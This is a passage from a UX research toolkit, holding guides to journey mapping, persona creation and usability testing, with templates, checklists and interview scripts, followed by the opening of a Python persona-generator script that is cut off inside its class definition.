| Current State | How things are today | Identifying pain points |
| Future State | Ideal experience | Design vision |
| Day-in-the-Life | Beyond your product | Context understanding |
| Service Blueprint | Backend processes | Operations alignment |
### When to Create Journey Maps
| Scenario | Map Type | Outcome |
|----------|----------|---------|
| New product | Future state | Design direction |
| Redesign | Current + Future | Gap analysis |
| Churn investigation | Current state | Pain point diagnosis |
| Cross-team alignment | Service blueprint | Process optimization |
---
## Mapping Process
### Step 1: Define Scope
**Questions to Answer:**
- Which persona is this journey for?
- What goal are they trying to achieve?
- Where does the journey start and end?
- What timeframe does it cover?
**Scope Template:**
```
Persona: [Name from persona library]
Goal: [Specific outcome they want]
Start: [Trigger that begins journey]
End: [Success criteria or exit point]
Timeframe: [Hours/Days/Weeks]
```
**Example:**
```
Persona: Alex the Power User
Goal: Set up automated weekly reports
Start: Realizes manual reporting is unsustainable
End: First automated report runs successfully
Timeframe: 1-2 days
```
### Step 2: Gather Data
**Data Sources for Journey Mapping:**
| Source | Insights Gained |
|--------|-----------------|
| User interviews | Actions, emotions, quotes |
| Session recordings | Actual behavior patterns |
| Support tickets | Common pain points |
| Analytics | Drop-off points, time spent |
| Surveys | Satisfaction at stages |
**Interview Questions for Journey Mapping:**
1. "Walk me through how you first discovered [product]"
2. "What made you decide to try it?"
3. "Describe your first day using it"
4. "What was the hardest part?"
5. "When did you feel confident using it?"
6. "What would you change about that experience?"
### Step 3: Map the Stages
**Identify Natural Breakpoints:**
Look for moments where:
- User's mindset changes
- Channels shift (web → app → email)
- Time passes (hours, days)
- Goals evolve
**Stage Validation:**
Each stage should have:
- Clear entry criteria
- Distinct user actions
- Measurable outcomes
- Exit to next stage
### Step 4: Fill in Layers
For each stage, document:
1. **Actions**: What does the user do?
2. **Touchpoints**: Where do they interact?
3. **Thoughts**: What are they thinking?
4. **Emotions**: How do they feel?
5. **Pain Points**: What's frustrating?
6. **Opportunities**: Where can we improve?
### Step 5: Validate and Iterate
**Validation Methods:**
| Method | Effort | Confidence |
|--------|--------|------------|
| Team review | Low | Medium |
| User walkthrough | Medium | High |
| Data correlation | Medium | High |
| A/B test interventions | High | Very High |
---
## Journey Stages
### Common B2B SaaS Stages
```
┌────────────┬────────────┬────────────┬────────────┬────────────┐
│ AWARENESS │ EVALUATION │ ONBOARDING │ ADOPTION │ ADVOCACY │
├────────────┼────────────┼────────────┼────────────┼────────────┤
│ Discovers │ Compares │ Signs up │ Regular │ Recommends │
│ problem │ solutions │ Sets up │ usage │ to others │
│ exists │ │ First win │ Integrates │ │
└────────────┴────────────┴────────────┴────────────┴────────────┘
```
### Stage Detail Template
**Stage: Onboarding**
| Element | Description |
|---------|-------------|
| Goal | Complete setup, achieve first success |
| Duration | 1-7 days |
| Entry | User creates account |
| Exit | First meaningful action completed |
| Success Metric | Activation rate |
**Substages:**
1. Account creation
2. Profile setup
3. First feature use
4. Integration (if applicable)
5. First value moment
### B2C vs. B2B Stages
| B2C Stages | B2B Stages |
|------------|------------|
| Discover | Awareness |
| Browse | Evaluation |
| Purchase | Procurement |
| Use | Implementation |
| Return/Loyalty | Renewal |
---
## Touchpoint Analysis
### Touchpoint Categories
| Category | Examples | Owner |
|----------|----------|-------|
| Marketing | Ads, content, social | Marketing |
| Sales | Demos, calls, proposals | Sales |
| Product | App, features, UI | Product |
| Support | Help center, chat, tickets | Support |
| Transactional | Emails, notifications | Varies |
### Touchpoint Mapping Template
```
Stage: [Name]
Touchpoint: [Where interaction happens]
Channel: [Web/Mobile/Email/Phone/In-person]
Action: [What user does]
Owner: [Team responsible]
Current Experience: [1-5 rating]
Improvement Priority: [High/Medium/Low]
```
### Cross-Channel Consistency
**Check for:**
- Information consistency across channels
- Seamless handoffs (web → mobile)
- Context preservation (user doesn't repeat info)
- Brand voice alignment
**Red Flags:**
- User has to re-enter information
- Different answers from different channels
- Can't continue task on different device
- Inconsistent terminology
---
## Emotion Mapping
### Emotion Scale
```
POSITIVE
│
Delighted ────┤──── 😄 5
Pleased ────┤──── 🙂 4
Neutral ────┤──── 😐 3
Frustrated ────┤──── 😕 2
Angry ────┤──── 😠 1
│
NEGATIVE
```
### Emotional Triggers
| Trigger | Positive Emotion | Negative Emotion |
|---------|------------------|------------------|
| Speed | Delight | Frustration |
| Clarity | Confidence | Confusion |
| Control | Empowerment | Helplessness |
| Progress | Satisfaction | Anxiety |
| Recognition | Validation | Neglect |
### Emotion Data Sources
**Direct Signals:**
- Interview quotes: "I felt so relieved when..."
- Survey scores: NPS, CSAT, CES
- Support sentiment: Angry vs. grateful tickets
**Inferred Signals:**
- Rage clicks (frustration)
- Quick completion (satisfaction)
- Abandonment (frustration or confusion)
- Return visits (interest or necessity)
### Emotion Curve Patterns
**The Valley of Death:**
```
😄 ─┐
│ ╱
│ ╱
😐 ─│───╱────────
│╲ ╱
│ ╳ ← Critical drop-off point
😠 ─│╱ ╲─────────
│
Onboarding First Use Regular
```
**The Aha Moment:**
```
😄 ─┐ ╱──
│ ╱
│ ╱
😐 ─│──────╱────── ← Before: neutral
│ ↑
😠 ─│ Aha!
│
Stage 1 Stage 2 Stage 3
```
---
## Opportunity Identification
### Pain Point Prioritization
| Factor | Score (1-5) |
|--------|-------------|
| Frequency | How often does this occur? |
| Severity | How much does it hurt? |
| Breadth | How many users affected? |
| Solvability | Can we fix this? |
**Priority Score = (Frequency + Severity + Breadth) × Solvability**
### Opportunity Types
| Type | Description | Example |
|------|-------------|---------|
| Friction Reduction | Remove obstacles | Fewer form fields |
| Moment of Delight | Exceed expectations | Personalized welcome |
| Channel Addition | New touchpoint | Mobile app for on-the-go |
| Proactive Support | Anticipate needs | Tutorial at right moment |
| Personalization | Tailored experience | Role-based onboarding |
### Opportunity Canvas
```
┌─────────────────────────────────────────────────────────────┐
│ OPPORTUNITY: [Name] │
├─────────────────────────────────────────────────────────────┤
│ Stage: [Where in journey] │
│ Current Pain: [What's broken] │
│ Desired Outcome: [What should happen] │
│ Proposed Solution: [How to fix] │
│ Success Metric: [How to measure] │
│ Effort: [High/Medium/Low] │
│ Impact: [High/Medium/Low] │
│ Priority: [Calculated] │
└─────────────────────────────────────────────────────────────┘
```
### Quick Wins vs. Strategic Bets
| Criteria | Quick Win | Strategic Bet |
|----------|-----------|---------------|
| Effort | Low | High |
| Impact | Medium | High |
| Timeline | Weeks | Quarters |
| Risk | Low | Medium-High |
| Requires | Small team | Cross-functional |
---
## Templates
### Basic Journey Map Template
```
PERSONA: _______________
GOAL: _______________
┌──────────┬──────────┬──────────┬──────────┬──────────┐
│ STAGE 1 │ STAGE 2 │ STAGE 3 │ STAGE 4 │ STAGE 5 │
├──────────┼──────────┼──────────┼──────────┼──────────┤
│ Actions │ │ │ │ │
│ │ │ │ │ │
├──────────┼──────────┼──────────┼──────────┼──────────┤
│ Touch- │ │ │ │ │
│ points │ │ │ │ │
├──────────┼──────────┼──────────┼──────────┼──────────┤
│ Emotions │ │ │ │ │
│ (1-5) │ │ │ │ │
├──────────┼──────────┼──────────┼──────────┼──────────┤
│ Pain │ │ │ │ │
│ Points │ │ │ │ │
├──────────┼──────────┼──────────┼──────────┼──────────┤
│ Opport- │ │ │ │ │
│ unities │ │ │ │ │
└──────────┴──────────┴──────────┴──────────┴──────────┘
```
### Detailed Stage Template
```
STAGE: _______________
DURATION: _______________
ENTRY CRITERIA: _______________
EXIT CRITERIA: _______________
USER ACTIONS:
1. _______________
2. _______________
3. _______________
TOUCHPOINTS:
• Channel: _____ | Owner: _____
• Channel: _____ | Owner: _____
THOUGHTS:
"_______________"
"_______________"
EMOTIONAL STATE: [1-5] ___
PAIN POINTS:
• _______________
• _______________
OPPORTUNITIES:
• _______________
• _______________
METRICS:
• Completion rate: ___%
• Time spent: ___
• Drop-off: ___%
```
### Service Blueprint Extension
Add backstage layers:
```
┌─────────────────────────────────────────────────────────────┐
│ FRONTSTAGE (User sees) │
├─────────────────────────────────────────────────────────────┤
│ User actions, touchpoints, emotions │
├─────────────────────────────────────────────────────────────┤
│ LINE OF VISIBILITY │
├─────────────────────────────────────────────────────────────┤
│ BACKSTAGE (User doesn't see) │
├─────────────────────────────────────────────────────────────┤
│ • Employee actions │
│ • Systems/tools used │
│ • Data flows │
├─────────────────────────────────────────────────────────────┤
│ SUPPORT PROCESSES │
├─────────────────────────────────────────────────────────────┤
│ • Backend systems │
│ • Third-party integrations │
│ • Policies/procedures │
└─────────────────────────────────────────────────────────────┘
```
---
## Quick Reference
### Journey Mapping Checklist
**Preparation:**
- [ ] Persona selected
- [ ] Goal defined
- [ ] Scope bounded
- [ ] Data gathered (interviews, analytics)
**Mapping:**
- [ ] Stages identified
- [ ] Actions documented
- [ ] Touchpoints mapped
- [ ] Emotions captured
- [ ] Pain points identified
**Analysis:**
- [ ] Opportunities prioritized
- [ ] Quick wins identified
- [ ] Strategic bets proposed
- [ ] Metrics defined
**Validation:**
- [ ] Team reviewed
- [ ] User validated
- [ ] Data correlated
### Common Mistakes
| Mistake | Impact | Fix |
|---------|--------|-----|
| Too many stages | Overwhelming | Limit to 5-7 |
| No data | Assumptions | Interview users |
| Single session | Bias | Multiple sources |
| No emotions | Misses human element | Add feeling layer |
| No follow-through | Wasted effort | Create action plan |
---
*See also: `persona-methodology.md` for persona creation*
FILE:references/persona-methodology.md
# Persona Methodology Guide
Reference for creating research-backed, data-driven user personas.
---
## Table of Contents
- [What Makes a Valid Persona](#what-makes-a-valid-persona)
- [Data Collection Methods](#data-collection-methods)
- [Analysis Framework](#analysis-framework)
- [Persona Components](#persona-components)
- [Validation Criteria](#validation-criteria)
- [Anti-Patterns](#anti-patterns)
---
## What Makes a Valid Persona
### Research-Backed vs. Assumption-Based
```
┌─────────────────────────────────────────────────────────────┐
│ PERSONA VALIDITY SPECTRUM │
├─────────────────────────────────────────────────────────────┤
│ │
│ ASSUMPTION-BASED HYBRID RESEARCH-BACKED │
│ │───────────────────────────────────────────────────────│ │
│ ❌ Invalid ⚠️ Limited ✅ Valid │
│ │
│ • "Our users are..." • Some interviews • 20+ users │
│ • No data • 5-10 data points • Quant + Qual │
│ • Team opinions • Partial patterns • Validated │
│ │
└─────────────────────────────────────────────────────────────┘
```
### Minimum Viability Requirements
| Requirement | Threshold | Confidence Level |
|-------------|-----------|------------------|
| Sample size | 5 users | Low (exploratory) |
| Sample size | 20 users | Medium (directional) |
| Sample size | 50+ users | High (reliable) |
| Data types | 2+ sources | Required |
| Interview depth | 30+ min | Recommended |
| Behavioral data | 1 week+ | Recommended |
### The Persona Validity Test
A valid persona must pass these checks:
1. **Grounded in Data**
- Can you point to specific user quotes?
- Can you show behavioral data supporting claims?
- Are demographics from actual user profiles?
2. **Represents a Segment**
- Does this persona represent 15%+ of your user base?
- Are there other users who fit this pattern?
- Is it a real cluster, not an outlier?
3. **Actionable for Design**
- Can designers make decisions from this persona?
- Does it reveal unmet needs?
- Does it clarify feature priorities?
---
## Data Collection Methods
### Quantitative Sources
| Source | Data Type | Use For |
|--------|-----------|---------|
| Analytics | Behavior | Usage patterns, feature adoption |
| Surveys | Demographics, preferences | Segmentation, satisfaction |
| Support tickets | Pain points | Frustration patterns |
| Product logs | Actions | Feature usage, workflows |
| CRM data | Profile | Job roles, company size |
### Qualitative Sources
| Source | Data Type | Use For |
|--------|-----------|---------|
| User interviews | Motivations, goals | Deep understanding |
| Contextual inquiry | Environment | Real-world context |
| Diary studies | Longitudinal | Behavior over time |
| Usability tests | Pain points | Specific frustrations |
| Customer calls | Quotes | Authentic voice |
### Data Collection Matrix
```
QUICK DEEP
(1-2 weeks) (4+ weeks)
│ │
┌─────────┼──────────────────┼─────────┐
QUANT │ Survey │ │ Product │
│ + CRM │ │ Logs + │
│ │ │ A/B │
├─────────┼──────────────────┼─────────┤
QUAL │ 5 │ │ 15+ │
│ Quick │ │ Deep │
│ Calls │ │ Inter- │
│ │ │ views │
└─────────┴──────────────────┴─────────┘
```
### Interview Protocol
**Pre-Interview:**
- Review user's analytics data
- Note usage patterns to explore
- Prepare open-ended questions
**Interview Structure (45-60 min):**
1. **Context (10 min)**
- "Walk me through your typical day"
- "When do you use [product]?"
- "What were you doing before you found us?"
2. **Behaviors (15 min)**
- "Show me how you use [feature]"
- "What do you do when [scenario]?"
- "What's your workaround for [pain point]?"
3. **Goals & Frustrations (15 min)**
- "What are you ultimately trying to achieve?"
- "What's the hardest part about [task]?"
- "If you had a magic wand, what would you change?"
4. **Reflection (10 min)**
- "What would make you recommend us?"
- "What almost made you quit?"
- "What's missing that you need?"
---
## Analysis Framework
### Pattern Identification
**Step 1: Code Data Points**
Tag each insight with:
- `[GOAL]` - What they want to achieve
- `[PAIN]` - What frustrates them
- `[BEHAVIOR]` - What they actually do
- `[CONTEXT]` - When/where they use product
- `[QUOTE]` - Direct user words
**Step 2: Cluster Similar Patterns**
```
User A: Uses daily, advanced features, keyboard shortcuts
User B: Uses daily, complex workflows, automation
User C: Uses weekly, basic needs, occasional
User D: Uses daily, power features, API access
Cluster 1: A, B, D (Power Users - daily, advanced)
Cluster 2: C (Casual User - weekly, basic)
```
**Step 3: Calculate Cluster Size**
| Cluster | Users | % of Sample | Viability |
|---------|-------|-------------|-----------|
| Power Users | 18 | 36% | Primary persona |
| Business Users | 15 | 30% | Primary persona |
| Casual Users | 12 | 24% | Secondary persona |
| Mobile-First | 5 | 10% | Consider merging |
### Archetype Classification
| Archetype | Identifying Signals | Design Focus |
|-----------|--------------------| -------------|
| Power User | Daily use, 10+ features, shortcuts | Efficiency, customization |
| Casual User | Weekly use, 3-5 features, simple | Simplicity, guidance |
| Business User | Work context, team features, ROI | Collaboration, reporting |
| Mobile-First | Mobile primary, quick actions | Touch, offline, speed |
### Confidence Scoring
Calculate confidence based on data quality:
```
Confidence = (Sample Size Score + Data Quality Score + Consistency Score) / 3
Sample Size Score:
5-10 users = 1 (Low)
11-30 users = 2 (Medium)
31+ users = 3 (High)
Data Quality Score:
Survey only = 1 (Low)
Survey + Analytics = 2 (Medium)
Quant + Qual + Logs = 3 (High)
Consistency Score:
Contradicting data = 1 (Low)
Some alignment = 2 (Medium)
Strong alignment = 3 (High)
```
---
## Persona Components
### Required Elements
| Component | Description | Source |
|-----------|-------------|--------|
| Name & Photo | Memorable identifier | Stock photo, AI-generated |
| Tagline | One-line summary | Synthesized from data |
| Quote | Authentic voice | Direct from interviews |
| Demographics | Age, role, location | CRM, surveys |
| Goals | What they want | Interviews |
| Frustrations | Pain points | Interviews, support |
| Behaviors | How they act | Analytics, observation |
| Scenarios | Usage contexts | Interviews, logs |
### Optional Enhancements
| Component | When to Include |
|-----------|-----------------|
| Day-in-the-life | Complex workflows |
| Empathy map | Design workshops |
| Technology stack | B2B products |
| Influences | Consumer products |
| Brands they love | Marketing-heavy |
### Component Depth Guide
**Demographics (Keep Brief):**
```
❌ Too detailed:
Age: 34, Lives: Seattle, Education: MBA from Stanford
✅ Right level:
Age: 30-40, Urban professional, Graduate degree
```
**Goals (Be Specific):**
```
❌ Too vague:
"Wants to be productive"
✅ Actionable:
"Needs to process 50+ items daily without repetitive tasks"
```
**Frustrations (Include Evidence):**
```
❌ Generic:
"Finds the interface confusing"
✅ With evidence:
"Can't find export function (mentioned by 8/12 users)"
```
---
## Validation Criteria
### Internal Validation
**Team Check:**
- [ ] Does sales recognize this user type?
- [ ] Does support see these pain points?
- [ ] Does product know these workflows?
**Data Check:**
- [ ] Can we quantify this segment's size?
- [ ] Do behaviors match analytics?
- [ ] Are quotes from real users?
### External Validation
**User Validation (recommended):**
- Show persona to 3-5 users from segment
- Ask: "Does this sound like you?"
- Iterate based on feedback
**A/B Design Test:**
- Design for persona A vs. persona B
- Test with actual users
- Measure if persona-driven design wins
### Red Flags
Watch for these persona validity problems:
| Red Flag | What It Means | Fix |
|----------|---------------|-----|
| "Everyone" persona | Too broad to be useful | Split into segments |
| Contradicting data | Forcing a narrative | Re-analyze clusters |
| No frustrations | Sanitized or incomplete | Dig deeper in interviews |
| Assumptions labeled as data | No real research | Conduct actual research |
| Single data source | Fragile foundation | Add another data type |
---
## Anti-Patterns
### 1. The Elastic Persona
**Problem:** Persona stretches to include everyone
```
❌ "Sarah is 25-55, uses mobile and desktop, wants simplicity
but also advanced features, works alone and in teams..."
```
**Fix:** Create separate personas for distinct segments
### 2. The Demographic Persona
**Problem:** All demographics, no psychographics
```
❌ "John is 35, male, $80k income, urban, MBA..."
(Nothing about goals, frustrations, behaviors)
```
**Fix:** Lead with goals and frustrations, add minimal demographics
### 3. The Ideal User Persona
**Problem:** Describes who you want, not who you have
```
❌ "Emma is a passionate advocate who tells everyone
about our product and uses every feature daily..."
```
**Fix:** Base on real user data, include realistic limitations
### 4. The Committee Persona
**Problem:** Each stakeholder added their opinions
```
❌ CEO added "enterprise-focused"
Sales added "loves demos"
Support added "never calls support"
```
**Fix:** Single owner, data-driven only
### 5. The Stale Persona
**Problem:** Created once, never updated
```
❌ "Last updated: 2019"
Product has changed completely since then
```
**Fix:** Review quarterly, update with new data
---
## Quick Reference
### Persona Creation Checklist
- [ ] Minimum 20 users in data set
- [ ] At least 2 data sources (quant + qual)
- [ ] Clear segment boundaries
- [ ] Actionable for design decisions
- [ ] Validated with team and users
- [ ] Documented data sources
- [ ] Confidence level stated
### Time Investment Guide
| Persona Type | Time | Team | Output |
|--------------|------|------|--------|
| Quick & Dirty | 1 week | 1 | Directional |
| Standard | 2-4 weeks | 2 | Production |
| Comprehensive | 6-8 weeks | 3+ | Strategic |
---
*See also: `example-personas.md` for output examples*
FILE:references/usability-testing-frameworks.md
# Usability Testing Frameworks
Reference for planning and conducting usability tests that produce actionable insights.
---
## Table of Contents
- [Testing Methods Overview](#testing-methods-overview)
- [Test Planning](#test-planning)
- [Task Design](#task-design)
- [Moderation Techniques](#moderation-techniques)
- [Analysis Framework](#analysis-framework)
- [Reporting Template](#reporting-template)
---
## Testing Methods Overview
### Method Selection Matrix
| Method | When to Use | Participants | Time | Output |
|--------|-------------|--------------|------|--------|
| Moderated remote | Deep insights, complex flows | 5-8 | 45-60 min | Rich qualitative |
| Unmoderated remote | Quick validation, simple tasks | 10-20 | 15-20 min | Quantitative + video |
| In-person | Physical products, context matters | 5-10 | 60-90 min | Very rich qualitative |
| Guerrilla | Quick feedback, public spaces | 3-5 | 5-10 min | Rapid insights |
| A/B testing | Comparing two designs | 100+ | Varies | Statistical data |
### Participant Count Guidelines
```
┌─────────────────────────────────────────────────────────────┐
│ FINDING USABILITY ISSUES │
├─────────────────────────────────────────────────────────────┤
│ │
│ % Issues Found │
│ 100% ┤ ●────●────● │
│ 90% ┤ ●───── │
│ 80% ┤ ●───── │
│ 75% ┤ ●──── ← 5 users: 75-80% │
│ 50% ┤ ●──── │
│ 25% ┤ ●── │
│ 0% ┼────┬────┬────┬────┬────┬──── │
│ 1 2 3 4 5 6+ Users │
│ │
└─────────────────────────────────────────────────────────────┘
```
**Nielsen's Rule:** 5 users find ~75-80% of usability issues
| Goal | Participants | Reasoning |
|------|--------------|-----------|
| Find major issues | 5 | 80% coverage, diminishing returns |
| Validate fix | 3 | Confirm specific issue resolved |
| Compare designs | 8-10 per design | Need comparison data |
| Quantitative metrics | 20+ | Statistical significance |
---
## Test Planning
### Research Questions
Transform vague goals into testable questions:
| Vague Goal | Testable Question |
|------------|-------------------|
| "Is it easy to use?" | "Can users complete checkout in under 3 minutes?" |
| "Do users like it?" | "Will users choose Design A or B for this task?" |
| "Does it make sense?" | "Can users find the settings without hints?" |
### Test Plan Template
```
PROJECT: _______________
DATE: _______________
RESEARCHER: _______________
RESEARCH QUESTIONS:
1. _______________
2. _______________
3. _______________
PARTICIPANTS:
• Target: [Persona or user type]
• Count: [Number]
• Recruitment: [Source]
• Incentive: [Amount/type]
METHOD:
• Type: [Moderated/Unmoderated/Remote/In-person]
• Duration: [Minutes per session]
• Environment: [Tool/Location]
TASKS:
1. [Task description + success criteria]
2. [Task description + success criteria]
3. [Task description + success criteria]
METRICS:
• Completion rate (target: __%)
• Time on task (target: __ min)
• Error rate (target: __%)
• Satisfaction (target: __/5)
SCHEDULE:
• Pilot: [Date]
• Sessions: [Date range]
• Analysis: [Date]
• Report: [Date]
```
### Pilot Testing
**Always pilot before real sessions:**
- Run 1-2 test sessions with team members
- Check task clarity and timing
- Test recording/screen sharing
- Adjust based on pilot feedback
**Pilot Checklist:**
- [ ] Tasks understood without clarification
- [ ] Session fits in time slot
- [ ] Recording captures screen + audio
- [ ] Post-test questions make sense
---
## Task Design
### Good vs. Bad Tasks
| Bad Task | Why Bad | Good Task |
|----------|---------|-----------|
| "Find the settings" | Leading | "Change your notification preferences" |
| "Use the dashboard" | Vague | "Find how many sales you made last month" |
| "Click the blue button" | Prescriptive | "Submit your order" |
| "Do you like this?" | Opinion-based | "Rate how easy it was (1-5)" |
### Task Construction Formula
```
SCENARIO + GOAL + SUCCESS CRITERIA
Scenario: Context that makes task realistic
Goal: What user needs to accomplish
Success: How we know they succeeded
Example:
"Imagine you're planning a trip to Paris next month. [SCENARIO]
Book a hotel for 3 nights in your budget. [GOAL]
You've succeeded when you see the confirmation page. [SUCCESS]"
```
### Task Types
| Type | Purpose | Example |
|------|---------|---------|
| Exploration | First impressions | "Look around and tell me what you think this does" |
| Specific | Core functionality | "Add item to cart and checkout" |
| Comparison | Design validation | "Which of these two menus would you use to..." |
| Stress | Edge cases | "What would you do if your payment failed?" |
### Task Difficulty Progression
Start easy, increase difficulty:
```
Task 1: Warm-up (easy, builds confidence)
Task 2: Core flow (main functionality)
Task 3: Secondary flow (important but less common)
Task 4: Edge case (stress test)
Task 5: Free exploration (open-ended)
```
---
## Moderation Techniques
### The Think-Aloud Protocol
**Instruction Script:**
"As you work through the tasks, please think out loud. Tell me what you're looking at, what you're thinking, and what you're trying to do. There are no wrong answers - we're testing the design, not you."
**Prompts When Silent:**
- "What are you thinking right now?"
- "What do you expect to happen?"
- "What are you looking for?"
- "Tell me more about that"
### Handling Common Situations
| Situation | What to Say |
|-----------|-------------|
| User asks for help | "What would you do if I weren't here?" |
| User is stuck | "What are your options?" (wait 30 sec before hint) |
| User apologizes | "You're doing great. We're testing the design." |
| User goes off-task | "That's interesting. Let's come back to [task]." |
| User criticizes | "Tell me more about that." (neutral, don't defend) |
### Non-Leading Question Techniques
| Leading (Don't) | Neutral (Do) |
|-----------------|--------------|
| "Did you find that confusing?" | "How was that experience?" |
| "The search is over here" | "What do you think you should do?" |
| "Don't you think X is easier?" | "Which do you prefer and why?" |
| "Did you notice the tooltip?" | "What happened there?" |
### Post-Task Questions
After each task:
1. "How difficult was that?" (1-5 scale)
2. "What, if anything, was confusing?"
3. "What would you improve?"
After all tasks:
1. "What stood out to you?"
2. "What was the best/worst part?"
3. "Would you use this? Why/why not?"
---
## Analysis Framework
### Severity Rating Scale
| Severity | Definition | Criteria |
|----------|------------|----------|
| 4 - Critical | Prevents task completion | User cannot proceed |
| 3 - Major | Significant difficulty | User struggles, considers giving up |
| 2 - Minor | Causes hesitation | User recovers independently |
| 1 - Cosmetic | Noticed but not problematic | User comments but unaffected |
### Issue Documentation Template
```
ISSUE ID: ___
SEVERITY: [1-4]
FREQUENCY: [X/Y participants]
TASK: [Which task]
TIMESTAMP: [When in session]
OBSERVATION:
[What happened - factual description]
USER QUOTE:
"[Direct quote if available]"
HYPOTHESIS:
[Why this might be happening]
RECOMMENDATION:
[Proposed solution]
AFFECTED PERSONA:
[Which user types]
```
### Pattern Recognition
**Quantitative Signals:**
- Task completion rate < 80%
- Time on task > 2x expected
- Error rate > 20%
- Satisfaction < 3/5
**Qualitative Signals:**
- Same confusion point across 3+ users
- Repeated verbal frustration
- Workaround attempts
- Feature requests during task
### Analysis Matrix
```
┌─────────────────┬───────────┬───────────┬───────────┐
│ Issue │ Frequency │ Severity │ Priority │
├─────────────────┼───────────┼───────────┼───────────┤
│ Can't find X │ 4/5 │ Critical │ HIGH │
│ Confusing label │ 3/5 │ Major │ HIGH │
│ Slow loading │ 2/5 │ Minor │ MEDIUM │
│ Typo in text │ 1/5 │ Cosmetic │ LOW │
└─────────────────┴───────────┴───────────┴───────────┘
Priority = Frequency × Severity
```
---
## Reporting Template
### Executive Summary
```
USABILITY TEST REPORT
[Project Name] | [Date]
OVERVIEW
• Participants: [N] users matching [persona]
• Method: [Type of test]
• Tasks: [N] tasks covering [scope]
KEY FINDINGS
1. [Most critical issue + impact]
2. [Second issue]
3. [Third issue]
SUCCESS METRICS
• Completion rate: [X]% (target: Y%)
• Avg. time on task: [X] min (target: Y min)
• Satisfaction: [X]/5 (target: Y/5)
TOP RECOMMENDATIONS
1. [Highest priority fix]
2. [Second priority]
3. [Third priority]
```
### Detailed Findings Section
```
FINDING 1: [Title]
Severity: [Critical/Major/Minor/Cosmetic]
Frequency: [X/Y participants]
Affected Tasks: [List]
What Happened:
[Description of the problem]
Evidence:
• P1: "[Quote]"
• P3: "[Quote]"
• [Video timestamp if available]
Impact:
[How this affects users and business]
Recommendation:
[Proposed solution with rationale]
Design Mockup:
[Optional: before/after if applicable]
```
### Metrics Dashboard
```
TASK PERFORMANCE SUMMARY
Task 1: [Name]
├─ Completion: ████████░░ 80%
├─ Avg. Time: 2:15 (target: 2:00)
├─ Errors: 1.2 avg
└─ Satisfaction: ★★★★☆ 4.2/5
Task 2: [Name]
├─ Completion: ██████░░░░ 60% ⚠️
├─ Avg. Time: 4:30 (target: 3:00) ⚠️
├─ Errors: 3.1 avg ⚠️
└─ Satisfaction: ★★★☆☆ 3.1/5
[Continue for all tasks]
```
---
## Quick Reference
### Session Checklist
**Before Session:**
- [ ] Test plan finalized
- [ ] Tasks written and piloted
- [ ] Recording set up and tested
- [ ] Consent form ready
- [ ] Prototype/product accessible
- [ ] Note-taking template ready
**During Session:**
- [ ] Consent obtained
- [ ] Think-aloud explained
- [ ] Recording started
- [ ] Tasks presented one at a time
- [ ] Post-task ratings collected
- [ ] Debrief questions asked
- [ ] Thanks and incentive
**After Session:**
- [ ] Notes organized
- [ ] Recording saved
- [ ] Initial impressions captured
- [ ] Issues logged
### Common Metrics
| Metric | Formula | Target |
|--------|---------|--------|
| Completion rate | Successful / Total × 100 | >80% |
| Time on task | Average seconds | <2x expected |
| Error rate | Errors / Attempts × 100 | <15% |
| Task-level satisfaction | Average rating | >4/5 |
| SUS score | Standard formula | >68 |
| NPS | Promoters - Detractors | >0 |
---
*See also: `journey-mapping-guide.md` for contextual research*
FILE:scripts/persona_generator.py
#!/usr/bin/env python3
"""
Data-Driven Persona Generator
Creates research-backed user personas from user data and interviews.
Usage:
python persona_generator.py [json]
Without arguments: Human-readable formatted output
With 'json': JSON output for integration with other tools
Examples:
python persona_generator.py # Formatted persona output
python persona_generator.py json # JSON for programmatic use
Table of Contents:
==================
CLASS: PersonaGenerator
__init__() - Initialize archetype templates and persona components
generate_persona_from_data() - Main entry: generate persona from user data + interviews
format_persona_output() - Format persona dict as human-readable text
PATTERN ANALYSIS:
_analyze_user_patterns() - Extract usage, device, context patterns from data
_identify_archetype() - Classify user into power/casual/business/mobile archetype
_analyze_behaviors() - Analyze usage patterns and feature preferences
DEMOGRAPHIC EXTRACTION:
_aggregate_demographics() - Calculate age range, location, tech proficiency
_extract_psychographics() - Extract motivations, values, attitudes, lifestyle
NEEDS & FRUSTRATIONS:
_identify_needs() - Identify primary/secondary goals, functional/emotional needs
_extract_frustrations() - Extract pain points from patterns and interviews
CONTENT GENERATION:
_generate_name() - Generate persona name from archetype
_generate_tagline() - Generate one-line persona summary
_generate_scenarios() - Create usage scenarios based on archetype
_select_quote() - Select representative quote from interviews
DATA VALIDATION:
_calculate_data_points() - Calculate sample size and confidence level
_derive_design_implications() - Generate actionable design recommendations
FUNCTIONS:
create_sample_user_data() - Generate sample data for testing/demo
main() - CLI entry point
Archetypes Supported:
- power_user: Daily users, 10+ features, efficiency-focused
- casual_user: Weekly users, basic needs, simplicity-focused
- business_user: Work context, team collaboration, ROI-focused
- mobile_first: Mobile primary, on-the-go, quick interactions
Output Components:
- name, archetype, tagline, quote
- demographics: age, location, occupation, education, tech_proficiency
- psychographics: motivations, values, attitudes, lifestyle
- behaviors: usage_patterns, feature_preferences, interaction_style
- needs_and_goals: primary, secondary, functional, emotional
- frustrations: pain points with frequency
- scenarios: contextual usage stories
- data_points: sample_size, confidence_level, validation_method
- design_implications: actionable recommendations
"""
import json
from typing import Dict, List, Tuple
from collections import Counter, defaultdict
import random
class PersonaGenerator:
"""Generate data-driven personas from user research"""
def __init__(self):
self.persona_components = {
'demographics': ['age', 'location', 'occupation', 'education', 'income'],
'psychographics': ['goals', 'frustrations', 'motivations', 'values'],
'behaviors': ['tech_savviness', 'usage_frequency', 'preferred_devices', 'key_activities'],
'needs': ['functional', 'emotional', 'social']
}
self.archetype_templates = {
'power_user': {
'characteristics': ['tech-savvy', 'frequent user', 'early adopter', 'efficiency-focused'],
'goals': ['maximize productivity', 'automate workflows', 'access advanced features'],
'frustrations': ['slow performance', 'limited customization', 'lack of shortcuts'],
'quote': "I need tools that can keep up with my workflow"
},
'casual_user': {
'characteristics': ['occasional user', 'basic needs', 'prefers simplicity'],
'goals': ['accomplish specific tasks', 'easy to use', 'minimal learning curve'],
'frustrations': ['complexity', 'too many options', 'unclear navigation'],
'quote': "I just want it to work without having to think about it"
},
'business_user': {
'characteristics': ['professional context', 'ROI-focused', 'team collaboration'],
'goals': ['improve team efficiency', 'track metrics', 'integrate with tools'],
'frustrations': ['lack of reporting', 'poor collaboration features', 'no enterprise features'],
'quote': "I need to show clear value to my stakeholders"
},
'mobile_first': {
'characteristics': ['primarily mobile', 'on-the-go usage', 'quick interactions'],
'goals': ['access anywhere', 'quick actions', 'offline capability'],
'frustrations': ['poor mobile experience', 'desktop-only features', 'slow loading'],
'quote': "My phone is my primary computing device"
}
}
